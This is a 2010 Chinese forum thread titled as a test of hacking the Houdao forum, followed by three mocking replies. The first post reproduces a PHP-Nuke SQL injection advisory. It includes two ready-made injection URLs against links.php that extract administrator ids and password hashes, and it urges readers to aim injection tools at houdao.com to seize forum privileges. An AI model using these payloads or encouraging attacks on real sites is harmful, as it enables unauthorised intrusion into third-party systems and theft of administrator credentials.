关于入侵www.bbs.houdao.com的测验

社区服务
高级搜索
猴岛论坛电脑百科关于入侵www.bbs.houdao.com的测验
发帖 回复
倒序阅读 最近浏览的帖子最近浏览的版块
« 返回列表
3个回复

关于入侵www.bbs.houdao.com的测验

 楼层直达
hacker!

ZxID:9236426

等级: 上士
举报 只看楼主 使用道具 楼主   发表于: 2010-05-09 0
PHP-Nuke是一个广为流行的网站创建和管理工具,可使用很多数据库软件作为后端,如MySQL、PostgreSQL、mSQL、Interbase、Sybase等。
PHP-Nuke没有正确地过滤提交给viewslink模块的sid变量。远程攻击者可以通过提交恶意查询请求执行SQL注入攻击,完全入侵数据库系统。
<*来源:CMD ([email protected]
*>
测试方法:(我想猴岛同样有这样的注入点不访大家去试试将‘example'换成"houdao"使用注入工具注入进去。获得论坛权限。
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
http://www.example.com/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,pwd/**/from/**/authors/**/where/**/radminsuper=1/*
打赏 收藏 新鲜事

相关主题

回复 引用
  鲜花[0]  鸡蛋[0]
无奈、花落去

ZxID:11666231

等级: 大校
╰╮ 笑丶仅仅是一个表情。Understand,?

举报 只看该作者 沙发   发表于: 2010-05-09 0
好大一个烧饼。


回复 引用 新鲜事
  鲜花[0]  鸡蛋[0]
ablmdream

ZxID:4077558

等级: 大校
拉大锯,扯大锯,老家门口唱大戏,就是不带你丫去!
举报 只看该作者 板凳   发表于: 2010-05-09 0
  看得明我就是神了
回复 引用 新鲜事
  鲜花[0]  鸡蛋[0]
iΜ。

ZxID:10566305

等级: 贵宾
决定很重要。

举报 只看该作者 地板   发表于: 2010-05-09 0
脑残哦?
回复 引用 新鲜事
  鲜花[0]  鸡蛋[0]
« 返回列表
发帖 回复